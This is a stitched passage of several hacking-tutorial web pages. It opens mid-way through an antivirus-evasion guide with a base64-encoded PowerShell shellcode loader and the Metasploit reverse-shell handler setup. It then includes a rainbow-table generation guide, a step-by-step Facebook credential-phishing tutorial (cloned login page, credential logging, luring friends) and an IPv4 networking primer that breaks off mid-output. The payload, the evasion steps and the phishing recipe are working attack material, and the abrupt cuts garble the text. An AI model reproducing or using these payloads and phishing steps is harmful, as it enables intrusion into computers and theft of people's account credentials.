AAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHEAVgAgAD0AIAAkAHQAVAAuAEwAZQBuAGcAdABoAH0AOwAkAHEAZQA9ACQAWABkADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAANwAsACQAcQBWACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAWABEAD0AMAA7ACQAWABEACAALQBsAGUAIAAoACQAdABUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAFgARAArACsAKQAgAHsAJABYAGQAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAGUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAWABEACkALAAgACQAdABUAFsAJABYAEQAXQAsACAAMQApAH0AOwAkAFgAZAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQBlACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABFAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAdABUAFYAKQApADsAJABCAHYAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcABMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHAATAAgACQAQgB2ACAAJABFAGQAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQgB2ACAAJABFAGQAIgA7AH0A')"The other file created by Unicorn isunicorn.rc, a resource file which will automate themsfconsolesetup and configuration.Step 4: Start Msfconsole Using the Resource FileTo start Metasploit, run themsfconsole -r /opt/unicorn/unicorn.rccommand.msfconsole -r /opt/unicorn/unicorn.rc =[ metasploit v4.16.59-dev- ] + -- --=[ 1769 exploits - 1008 auxiliary - 307 post ] + -- --=[ 537 payloads - 41 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] [*] Processing /opt/unicorn/unicorn.rc for ERB directives. resource (/opt/unicorn/unicorn.rc)> use multi/handler resource (/opt/unicorn/unicorn.rc)> set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https resource (/opt/unicorn/unicorn.rc)> set LHOST 192.168.1.5 LHOST => 192.168.1.5 resource (/opt/unicorn/unicorn.rc)> set LPORT 443 LPORT => 443 resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false ExitOnSession => false resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true EnableStageEncoding => true resource (/opt/unicorn/unicorn.rc)> exploit -j [*] Exploit running as background job 0. [-] Handler failed to bind to 192.168.1.5:443 msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443The resource file will automatically enable the handler (multi/handler), set the payload type (windows/meterpreter/reverse_https), set the attacker's IP address (LHOST), set the port number (LPORT), enablestager encoding(EnableStageEncoding), and start the msfconsole listener (exploit -j) β€” easy.At this point, everything on the attacker's side is set up and ready for incoming connections. Now it's just a matter of verifying the payload works and effectively bypasses Windows Defender andantivirus software.Step 5: Test the Payload (Don't Upload It to VirusTotal)In my tests, Unicorn's PowerShell payload was able to bypass Google Chrome, Windows Defender, andAvast antivirus detectionsin a fully patched Windows 10 Enterprise machine.Many projects warn penetration testers of the dangers of using online virus scanners likeVirusTotal. In the case of TheFatRat, the developer's explicitly caution against using VirusTotal every time the program starts.As someone who regularly experiments with manyantivirus evasion software, I completely understand the temptation to know if the created payload will evade detection of the most popular antivirus software technologies. However, uploading to online virus scanners is extremely damaging to these projects. VirusTotal shares uploaded payloads with third-parties and, as a result, their collective detection rates dramatically increase over a short period of time.As an alternative to online scanners, I encourage pentester's to simulate their target's operating system environment using virtual machines. For example, if it'sdiscovered that a target on the local networkis using Windows 10 withAVGorAvast, create a Windows 10 VM, install the latest antivirus software in the VM, and test payloads inside the VM. This will give pentester's some reassurance that a payload is working properly and prevent VirusTotal from over-analyzing the malicious file and sharing its results with other companies.Continue to Concealing the Payload ...That's it for installing Metasploit, creating the PowerShell payload with Unicorn, and automating the msfconsole startup. Unicorn is a great tool which takes the difficulty out of creating sophisticated PowerShell payloads capable of bypassing popular antivirus software. In my follow up article, I'll show how to convert the PowerShell code into an executable and a few tricks for making the executable appear as an ordinary text file.Until next time, follow me on Twitter@tokyoneon_andGitHub. And as always, leave a comment below or message me on Twitter if you have any questions.Next Up:How to Create an Undetectable Payload, Part 2 (Concealing the Payload)Follow Null Byte onTwitter,Flipboard, andYouTubeFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image by Justin Meyers/Null Byte; Screenshots by tokyoneon/Null ByteRelatedHow To:Use MSFconsole's Generate Command to Obfuscate Payloads & Evade Antivirus DetectionHacking macOS:How to Create an Undetectable PayloadHacking Windows 10:How to Create an Undetectable Payload, Part 2 (Concealing the Payload)How To:Bypass Antivirus Using Powershell and Metasploit (Kali Tutorial)Hack Like a Pro:How to Bypass Antivirus Software by Disguising an Exploit's SignatureHacking Windows 10:How to Break into Somebody's Computer Without a Password (Exploiting the System)Hack Like a Pro:How to Change the Signature of Metasploit Payloads to Evade Antivirus DetectionHack Like a Pro:Exploring the Inner Architecture of MetasploitHack Like a Pro:How to Evade AV Software with ShellterHack Like a Pro:Metasploit for the Aspiring Hacker, Part 5 (Msfvenom)Hack Like a Pro:How to Exploit and Gain Remote Access to PCs Running Windows XPAndroid for Hackers:How to Backdoor Windows 10 & Livestream the Desktop (Without RDP)How To:Bypass Antivirus Software by Obfuscating Your Payloads with GraffitiHow To:Identify Antivirus Software Installed on a Target's Windows 10 PCHow To:Create an Undetectable Trojan Using a Domain NameHow To:Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber DuckyHow To:Use the USB Rubber Ducky to Disable Antivirus Software & Install RansomwareHow To:Use Microsoft.com Domains to Bypass Firewalls & Execute PayloadsHacking macOS:How to Use One Python Command to Bypass Antivirus Software in 5 SecondsHacking Windows 10:How to Dump NTLM Hashes & Crack Windows PasswordsHacking Windows 10:How to Break into Somebody's Computer Without a Password (Setting Up the Payload)Android for Hackers:How to Backdoor Windows 10 Using an Android Phone & USB Rubber DuckyHow To:Bypass UAC & Escalate Privileges on Windows Using MetasploitHack Like a Pro:Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)Lockdown:The InfoSecurity Guide to Securing Your Computer, Part IHow To:The Hacks Behind Cracking, Part 1: How to Bypass Software RegistrationDrive-By Hacking:How to Root a Windows Box by Walking Past ItWindows Security:Software LevelHack Like a Pro:Hacking Samba on Ubuntu and Installing the Meterpreter
How to Create Rainbow Tables for Hashing Algorithms Like MD5, SHA1 & NTLM Β« Null Byte :: WonderHowTo
A rainbow table can be thought of like a dictionary, except instead of words and their definitions, it holds combinations of characters on one side and their hashed form on the other. What is a hash and why would you want to know what random combinations of characters are hashed into?Passwords on the internet are almost always stored hashed. A hash is a method of cryptography that is very cheap to calculate in one direction but very expensive to calculate in the opposite direction. What that means is that you can take a raw text input, say the stringpassword, and run a hashing algorithm on it such as MD5 to get an output of5F4DCC3B5AA765D61D8327DEB882CF99.While MD5 may be being replaced by stronger hashing methods such as bcrypt, it's still commonly used on LAMP stacks across the internet today.Going back to rainbow tables, we should have an entry sayingpasswordon one side and5F4DCC3B5AA765D61D8327DEB882CF99on the other. Should we ever come across this hash, we can search our table, find it, and learn what the original string was. However, before we can do that, we must learn how to make a rainbow table.For this guide, I'll be demonstrating from a base of Kali Linux running in a virtual machine, but the instructions for most Linux distros will be basically the same. I will also include some information for those on the Windows platform.Step 1: Set Up RainbowCrackWe'll be usingRainbowCrackto create and sort our tables. Kali Linux comes with RainbowCrack already installed, but if you don't have it or are running on Windows, you candownload itor useaptitudeif you are on a Debian-based distro like Mint.On Windows, once you have downloaded RainbowCrack, create a new folder that you can easily navigate to with Command Prompt and extract everything into it. Then, open the Command Prompt, and navigate to the directory you created. Move on to Step 2, since the next paragraphs are for Kali.In Kali, once we're sure RainbowCrack is installed, we'll need to create a new folder and navigate into it. This is where our tables will be generated and sorted (seeStep 3and4for exceptions). You can use the following commands to set up the folder in your home directory. It's best to use a new and empty directory for the sorting process that comes after the table is generated.cd ~ mkdir RainbowTables cd RainbowTablesIt's important to keep in mind that rainbow tables take up enormous amounts of storage space, especially when you include a wide character set and a long max length. Make sure you have room for hundreds of gigabytes at the very least. Having at least half a terabyte free is better. If you don't have this space available, you can still follow along using smaller character sets, shorter max lengths, and shorter chain lengths.Step 2: View the ParametersOnce we're in the directory we created, we can runrtgento make sure everything is installed correctly. This will also return some convenient help, with some example usages ofrtgenand the naming of parameters.rtgen RainbowCrack 1.7 Copyright 2017 RainbowCrack Project. All rights reserved. http://project-rainbowcrack.com/ usage: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index -bench hash algorithms implemented: lm HashLen=8 PlaintextLen=0-7 ntlm HashLen=16 PlaintextLen=0-15 md5 HashLen=16 PlaintextLen=0-15 sha1 HashLen=20 PlaintextLen=0-20 sha256 HashLen=32 PlaintextLen=0-20 examples: rtgen md5 loweralpha 1 7 0 1000 1000 0 rtgen md5 loweralpha 1 7 0 -benchAs you can see, there are two usages given with one example for each:rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index rtgen md5 loweralpha 1 7 0 1000 1000 0 rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index -bench rtgen md5 loweralpha 1 7 0 -benchOf course, because of the space constraints, the parameters aren't really explained, so I'll do that so it's easier to follow along later.hash_algorithm:This is the hash algorithm that we want our rainbow tables to use. You can see a list of available algorithms underhash algorithms implementedin the return text. For our example, we will use MD5, but RainbowCrack is just as capable of making perfect SHA1 and NTLM tables, and I will provide the code for the tables for all three.charset:The set of characters used to generate the plain-text strings for the rainbow tables.Numericis digits 0–9,loweralphais alphanumeric (all letters and digits 0–9), but only in lowercase. For a full list of charsets that you can use, see "charset.txt" that comes with RainbowCrack.plaintext_len_min:The minimum length of plaintext strings. For example, if we choose a numeric charset and a min and max of 1, our table will contain all digits 0–9 and their hashed equivalent.plaintext_len_max:The maximum length of plaintext strings. For example, if we choose a min of 1 and a max of 2, we get all digits 0–9 and 00–99 and their hashed equivalents in our table.table_index:This parameter selects the reduction function. A reduction function is a math formula that trims the number of combinations by removing combinations that are incredibly unlikely to be used. By doing so, it lowers computational time drastically. But the flip-side is that there is a tiny possibility that any given reduction function will skip the combination we're looking for, so "perfect" tables use multiple runs with different reduction functions to make tables that are "perfect," containing every possible combination.chain_len:This controls the length of each table. The larger this number is, the more plaintexts are hashed and stored in the table. This is why the reduction function mentioned above matters β€” it will reduce possible combinations to the chain length you picked. The flip-side of having a long chain length is generation time. If you want a table that is "perfect" and vast, it can take months.chain_num:This is the number of chains to generate. Each chain will be 16 bytes.part_index:This is for situations where your hard disk space or computing power is limited, or when your filesystem is unable to address extraordinarily large files. We can change this from the 0 that it should normally be to segment the table file into smaller parts.-bench:This is a flag that you can add to do a benchmark on the settings that you have selected. It will not actually create any rainbow tables, it will just determine some numbers that you can use to determine how fast you can generate table entries. Based off of that, you can determine how long table generation will actually take.Step 3: Generate the Rainbow TablesNow, let's generate those tables! Note, if you're using Windows instead of Linux, you may have to usertgen.exeinstead of justrtgenin my examples below. Run each of the commands below separately. But be warned, these will take hours to fully generate. You can hitCtrl-Con your keyboard to quit, and the next time you run the same command, it will resume where it left off.rtgen md5 loweralpha-numeric 1 7 0 2400 24652134 0 rtgen md5 loweralpha-numeric 1 7 1 2400 24652134 0 rtgen md5 loweralpha-numeric 1 7 2 2400 24652134 0 rtgen md5 loweralpha-numeric 1 7 3 2400 24652134 0 rtgen md5 loweralpha-numeric 1 7 4 2400 24652134 0 rtgen md5 loweralpha-numeric 1 7 5 2400 24652134 0The commands above generate six different rainbow tables using theloweralpha-numericcharset which contains 36 possible characters. For any plaintext falling into that category, we will have over a 99% chance of having its hashed equivalent in our tables.rtgen md5 loweralpha-numeric 1 7 0 2400 24652134 0 rainbow table md5_loweralpha-numeric#1-7_0_2400x24652134_0.rt parameters hash algorithm: md5 hash length: 16 charset name: loweralpha-numeric charset data: abcdefghijklmnopqrstuvwxyz0123456789 charset data in hex: 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 charset length: 36 plaintext length range: 1 - 7 reduce offset: 0x00000000 plaintext total: 80603140212 sequential starting point begin from 0 (0x0000000000000000) generating... 65536 of 24652134 rainbow chains generated (0 m 21.3 s) 131072 of 24652134 rainbow chains generated (0 m 32.8 s) 196608 of 24652134 rainbow chains generated (0 m 32.2 s) 262144 of 24652134 rainbow chains generated (0 m 32.9 s) 327680 of 24652134 rainbow chains generated (0 m 32.2 s) 393216 of 24652134 rainbow chains generated (0 m 33.0 s) 458752 of 24652134 rainbow chains generated (0 m 33.3 s) 524288 of 24652134 rainbow chains generated (0 m 34.0 s) 589824 of 24652134 rainbow chains generated (0 m 33.3 s) 655360 of 24652134 rainbow chains generated (0 m 33.8 s) 720896 of 24652134 rainbow chains generated (0 m 33.0 s) 786432 of 24652134 rainbow chains generated (0 m 32.3 s) 851968 of 24652134 rainbow chains generated (0 m 34.0 s) 917504 of 24652134 rainbow chains generated (0 m 34.3 s) 983040 of 24652134 rainbow chains generated (0 m 34.4 s) 1048576 of 24652134 rainbow chains generated (0 m 33.7 s) .....When each rainbow table is finished, it will be saved as the .rt file that the command generates, putting it into your current directory. So each rainbow table will get its own unique .rt file. Note that on newer versions, rainbow tables may be saved in your/usr/share/rainbowcrackdirectory instead of your current directory.If you are trying to create tables for SHA1 or NTLM, or perhaps a different charset and length for MD5, you can referencethe tables created by the RainbowCrack team. At the bottom of the page, you can select the algorithm you are looking for to view a list of the commands to run to build your own.Step 4: Sort the Rainbow TablesOur rainbow table generation is done, but we can't use them just yet. We need to sort them into one table that we can then efficiently search. Luckily, doing this is easy, we just run:rtsort .As long as we are in the directory we generated them in, thertsort .command will turn all the tables we generated into easy-to-search .rt files. These files will be accessible in the directory we chose, in this case,Rainbow Tablesin the home directory. However, in some versions of Rainbow Crack, all .rt files will be saved in the/usr/share/rainbowcrackdirectory, no matter what directory you're currently in. The command above should still work when in the folder you created inStep 1.Now you have a near perfect rainbow table at your disposal. We'll discuss what we can do with this table, how to do it, and how to protect yourself from people attempting to use rainbow tables to crack your passwords in another guide coming soon.Don't Miss:Null Byte's Guides on Password CrackingFollow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image and screenshots by Goods/Null ByteRelatedHow To:Use Hash-Identifier to Determine Hash Types for Password CrackingHow To:Hack MD5 passwords with Cain and AbelHow To:Creating Unique and Safe Passwords, Part 1 Using WordlistsHack Like a Pro:How to Crack Passwords, Part 1 (Principles & Technologies)How To:Hack MD5 passwordsHacking Windows 10:How to Intercept & Decrypt Windows Passwords on a Local NetworkHack Like a Pro:Cryptography Basics for the Aspiring HackerNews:Inside Bitcoin - Part 2 - Cryptographic HashesHow To:Crack MD5 Hashes with All of Kali Linux's Default WordlistsHack Like a Pro:Digital Forensics Using Kali, Part 2 (Acquiring a Hard Drive Image for Analysis)How To:Crack Shadow Hashes After Getting Root on a Linux SystemHack Like a Pro:How to Crack Passwords, Part 2 (Cracking Strategy)Hacking Windows 10:How to Dump NTLM Hashes & Crack Windows PasswordsHow to Hack Wi-Fi:Cracking WPA2-PSK Passwords with CowpattyRainbow Tables:How to Create & Use Them to Crack PasswordsHow To:Make an Unbreakable Linux Password Using a SHA-2 Hash AlgorithmHow To:How Hackers Take Your Encrypted Passwords & Crack ThemSecure Your Computer, Part 2:Password-Protect the GRUB Bootloader on Dual-Booted PCsHow To:Recover a Windows Password with OphcrackHow To:GPU Accelerate Cracking Passwords with HashcatNews:FarmVille German Limited Edition ThemeGoodnight Byte:HackThisSite, Realistic 5 - Real Hacking SimulationsHow To:Remove a Windows Password with a Linux Live CDNews:Rainbow Chickens
Social Engineering, Part 2: Hacking a Friend's Facebook Password Β« Null Byte :: WonderHowTo
Welcome to the secondNull Bytein aseries educating you on Social Engineering awareness and techniques. Today, I'm going to show you how a saavy Social Engineer would trick a friend into unknowingly surrendering theirFacebookpassword. My intent is to warn and demonstrate how easy it is to succumb to phishing via Social Engineering, and therefore expose yourself.What is Phishing?Phishing is the act of tricking someone into signing onto a fake website, which mimics a real site, such as Facebook. The phishing page will log the credentials that the user enters in the password field, and usually goes unnoticed with the right circumstances and some Social Engineering.The phishing page is created by visiting the website you want to mock, copying the source HTML code, and then altering it to use a custom PHP script to log the victim's credentials. A good phishing page will seamlessly use cookies to bypass redirect filters. So if a cookie for the site exists, the user will be logged in and more than likely won't realize what happened.WarningsPhishing is illegal.Only phish your friends who give you consent to do so.Step1Get a Web HostYou need a place to host your phishing page. I like T35β€”they are free, and offer cPanel hosting.Make a free account onT35.Go to your email that you used and click the link confirming the account.Step2Create the Phishing PageNow we need to create the site that will log the victim's credentials.Open up a text document using notepad, or your choice in text editors.Go to the Facebooklogin page.Right-click somewhere on the page, and clickView page source.Copy all of the contents of the source code and paste them into your text document.Hitctrl + f, and search for "action=" and change the method to "GET", and the text to the right of"action=" to "log.php".ClickFile > Save asand save it with the name "index.php" (make sure to click the drop-down menu to select "all files" if it's not selected already).Make a new text file, and pastethisas the contents (paste the raw text, not the numbered). This is the file written in PHP that logs the victim's login details.Save the file as "log.php". Again, make sure "all files" is selected in the file type drop-down menu.Log in to your T35 account and clickUpload.Upload both files to the root of your website (not in a folder).When credentials are logged, they will be in a file called "passwords.txt" in the root of your website. Check the box next to the "passwords.txt" file when you get some logs, and clickchmod. Change the file to 466 permissions, so other people can't read the victim's passwords.Step3Perform the PhishIn a status update on Facebook, post something like the following:"Check out this funny picture of me on my website xD <post link to phishing page here>."It's really that simple. You should start to see people's login credentials getting stored in your "passwords.txt" file. Simply because it comes from a "trusted" Facebook friend, they will go with their instincts and click the link without thinking twice about it. The best part about that PHP code posted above, is the header sends you back to the Facebook homepage, bypassing the redirect filter warning that Facebook has implemented, which will make it nearly seamless to the user who fell for it.Start some conversation in theForums, orIRC channel #nullbytezon FreeNode!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseImage byRichzendyRelatedHack Like a Pro:The Ultimate Social Engineering HackSocial Engineering:The Most Powerful HackHack Like a Pro:How to Spear Phish with the Social Engineering Toolkit (SET) in BackTrackNews:8 Tips for Creating Strong, Unbreakable PasswordsNews:How to Study for the White Hat Hacker Associate Certification (CWA)How To:Freeze a Facebook account with Facebook FreezerSocial Engineering:How to Use Persuasion to Compromise a Human TargetHack Like a Pro:How to Get Facebook Credentials Without Hacking FacebookHow To:Facebook Freezer with crack!!How To:Use Social Engineering to Hack ComputersHow to Hack Wi-Fi:Get Anyone's Wi-Fi Password Without Cracking Using WifiphisherHow To:Easily See Passwords for Wi-Fi Networks You've Connected Your Android Device ToListen In:Live Social Engineering Phone Calls with Professional Social Engineers (Week 2)Weekend Homework:How to Become a Null Byte Contributor (2/17/2012)Listen In:Live Social Engineering Phone Calls with Professional Social Engineers (Final Session)Listen In:Live Social Engineering Phone Calls with Professional Social EngineersSocial Engineering, Part 1:Scoring a Free Cell PhoneHow To:Really Connect Your Words with Friends Mobile Account to FacebookHow To:The Official Google+ Insider's Guide IndexNews:Live Social EngineeringHow To:Proof of Social Engineering Success!How To:Score Free Game Product Keys with Social EngineeringWeekend Homework:How to Become a Null Byte Contributor (2/3/2012)News:Hipstamatic Gets Social and Announces D-Series Disposable Camera AppHow To:Advanced Social Engineering, Part 1: Exact Revenge on Craigslist Scammers with Tabnab PhishingHow To:Sync Your Google+ Posts with Facebook and TwitterHow To:Social Engineer Your Way Into an Amusement Park for FreeDon't Get Doxed:5 Steps to Protecting Your Private Information on the WebSocial Network Wars, Part 2:Google+ vs FacebookThe Social Network Wars:Google+ vs FacebookHow To:Do Email Spoofing Using Sharpmail.How To:Advanced Social Engineering, Part 2: Hack Google Accounts with a Google Translator ExploitNews:Privacy in the InternetNews:Top 13 Google Insiders to Follow on Google+News:The Social NetworkWinspiration:10 Pieces of Hobo Advice to Inspire Your WTFoto Macro ChallengeScramble with Friends:Zynga's Newly Released Word Game for iOS
How to Understand & Use IPv4 to Navigate a Network Β« Null Byte :: WonderHowTo
You may not know it, but the IPv4 address of your computer contains tons of useful information about whatever Wi-Fi network you're on. By knowing what your IPv4 address and subnet mask are telling you, you can easily scan the whole network range, locate the router, and discover other devices on the same network.While IP addresses like 192.168.0.5/24 may look familiar to you, the IP address assigned to your computer by the router is actually telling you a lot about the network itself. If we didn't know anything at all about which network we were on, we might have a hard time running a scanning tool that asks us to provide a range of IP addresses to scan. We could panic and scan every IPv4 address in existence by just scanning 0.0.0.0/0, but at 42,94,967,294 possible IP addresses, this would take a very long time.Don't Miss:How to Conduct Passive Reconnaissance of a Potential TargetInstead, we can be smart about how we scan a network by learning a little about how IPv4 works. You don't need to be a network engineer to be smart about your scanning and to quickly calculate a network range, and learning to quickly find the router on a network can save you from needing to reveal your presence with a scan.What Is an IP Address?In order for any device to connect to a Wi-Fi or Ethernet network, two pieces of information are needed to successfully transmit and receive information. The first is a MAC address, which is like the electronic serial number of a device which doesn't change as it joins different networks. The MAC address is used to identify the device physically on the network and uses a format like below.40:70:09:7a:64:97 - ARRIS Group, Inc.MAC addresses are useful because the first half of them are assigned to a manufacturer to program into the devices they sell. That means that we can use the MAC address of a device to see who makes it, which is in many cases enough to identify what it is. For example, identifying a "nestcam" device almost certainly means a"Nest" brand security camera.The other piece of information needed to join a network is an IP address. Unlike the MAC address of a device which doesn't change, your IP address is like a parking space on the network that may change depending on what network you're connected to and how many other spaces are occupied by other devices. When a network creates a link between the physical MAC address of a device and the IP address assigned by the router to a device joining the network, the combination allows a successful connection to the network.You can find your IP address by runningifconfigorip ain a terminal window.ifconfig | grep inetinet 192.168.0.24 netmask 255.255.255.0 broadcast 192.168.0.255In practice, an example would be your smartphone connecting to the Wi-Fi network at a coffee shop. Your device has the same MAC address at home as it does at the coffee shop, but the router at the coffee shop would assign you a potentially different IP address every time you joined.Once you've connected to the network, the router and nearby devices store the relationship between your device's MAC address and the IP address it's been assigned in a table that allows easy delivery of information. You can see this table by typingarp -ainto a terminal window.arp -a? (192.168.0.11) at 3c:dc:bc:05:77:d4 [ether] on wlan0 _gateway (192.168.0.1) at 40:70:09:7a:64:97 [ether] on wlan0In this example, my computer has stored the IP and MAC address of the router (gateway) and another computer on the network, allowing packets to be sent to either.IPv4 is the most widespread and easy to understand IP addressing system but is gradually being replaced by the more complicated but scaleable IPv6. In spite of this, most networks will still assign you an IPv4 address, making it easy to find your way around the network. The most important thing to know about IP addresses is that they are just a long, unique number assigned to a device on a network. That's all.What You'll NeedTo learn how IP addresses work, you'll need a connection to a router that assigns you an IPv4 address. Many of the calculations to find the network range can be done on paper on in your head, but I find it useful to use a calculator in many cases.You can use tools like ipcalc to make it easier to quickly calculate IP ranges, but it won't help you much unless you know what it's telling you. In this guide, we'll use ipcalc a few times, so you can install it by typingapt install ipcalcin a terminal window or installing it from itsGitHub page.Step 1: Count in BinaryThe format of an IPv4 address can look intimidating, but the average IPv4 address isn't conveying an overwhelming amount of information. To start, you should know that an IP address is a number in binary, the language computers speak, which we write as digits so that humans don't accidentally mess it up.Don't Miss:Abusing DNS for ReconnaissanceTo understand an IP address, we need to do some very simple math. As humans, we have ten fingers, so we count in base 10. That means, after we get to 9, we add another digit. Binary uses base 2 instead of base 10, so to count to 2 in binary, we would write "10."The way it works is as follows:1 = 1 2 = 10 3 = 11 4 = 100 5 = 101 6 = 110 7 = 111 8 = 1000 9 = 1001 10 = 1010When dealing with an IP address, each number divided by a dot represents an eight-digit binary number. For the IP address of 192.168.0.2, we can convert the IP address into an eight-digit binary number by following this process:IP address: 192.168.0.2 First number: 192 Binary number positions: 128 64 32 16 8 4 2 1 0 0 0 0 0 0 0 0To convert our first number, we start on the left side of the binary number with the first value of 128. From left to right, first check to see if you subtract 128 from our number (192). We can, so the first number is 1.1XXXXXXXAfter subtracting 128 from 192, we have 64 remaining. The value of the next digit is 64. Can we subtract 64 from our remaining number (64)? Yes, so the next number is 1 as well.11XXXXXXThat leaves us with zero, so we fill in all zeros, leaving the resulting number 11000000 in binary. To a computer, this is identical to the number 192.With the first number converted, we do the same with the second.Second number: 168 Binary number positions: 128 64 32 16 8 4 2 1 0 0 0 0 0 0 0 0First, we try to subtract 128 from our number (168). We can, so the first number is 1.1XXXXXXXNext, we try to subtract 64 from our remaining number, which is 40. We can't, so the next number is 0.10XXXXXXNow, we try subtracting 32 from our remaining number of 40. We can, so the next number is 1.101XXXXXThe next number to try subtracting is 16 from our remaining amount of 8. We can't, so we add another 0 to the binary number.1010XXXXIt's pretty obvious that 8 can be subtracted from our remaining number of 8, so we add another 1 and fill in the rest with zeros to get our number.10101000Next, we convert the third number, which is just 0. We can represent this using all zeros as 00000000, leaving only the last number to convert.We obviously can't subtract any of the numbers before 2 from our number of 2 for the last number, so we'll add all zeros up until the 2 digit, then add another zero at the end. This leaves us with 00000010 as the binary number representing 2.After converting to binary, the IP address 192.168.0.2 becomes the following number, which is the big long number your computer uses to identify itself to devices on your local network.11000000.10101000.00000000.00000010Step 2: Calculate the Subnet MaskIP addresses contain two pieces of information for a router. The first half tells the router which network that the IP address is a part of, while the second half indicates which available parking space a particular device is using. Both are important for a router to know. If you try to connect to a device on a different network, your IP address will tell the router it needs to forward your connection on to another router that knows where that network is located.You can think of the network part of an IP address like the city you're sending a package to, and the host portion like the address within that city you're delivering it to. This allows for routers to quickly decide if they need to route traffic to a device on a local network or send the traffic elsewhere.So in our previous example IP address of 192.168.0.2, what part is talking about the network, and what part is talking about the host?To figure this out, we'll need to use a subnet mask. A subnet mask is like a highlighter made out of 1's that shows the router which part of the IP address is talking about a network. For our example of 192.168.0.2, we can show the network mask in three ways:255.255.255.0 192.168.0.2/24 11111111.11111111.11111111.00000000The first example is the way you'll see the subnet mask written pretty often, converted into digits to be easier to write. The last example shows what it really looks like and gives a clue for why we add the /24 to indicate this submask: it has twenty-four 1's in a row!So would a /8 subnet have a string of eight 1's in a row? Yep, that would be 255.0.0.0, or 11111111.00000000.00000000.00000000 in binary.So what would a 11111111.11110000.00000000.00000000 be? Well, it's got twelve 1's in a row, so it would be a /12 network, or 255.240.0.0.Subnet masks will always be a continuous group of 1's on the left side. Any part of your IP address that has a 1 in the subnet mask is talking about the network you're a part of. Everything with a zero is talking about a host address on the network.In our example of 192.168.0.2/24, the first part, 192.168.0, is referring to the network we are on. That means only the last part of the address is available for devices to "park" on the network. This is important to know because it tells us there are a total of 254 available IP addresses on the network.Step 3: Calculate the Network RangeNow that we know how subnet masks work, let's take a look at our current IP address. In this example, we can runifconfigin a terminal window to get our current IP address.ifconfigeth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether 50:7b:9d:7a:c8:8a txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 65413 bytes 14922237 (14.2 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 65413 bytes 14922237 (14.2 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0: 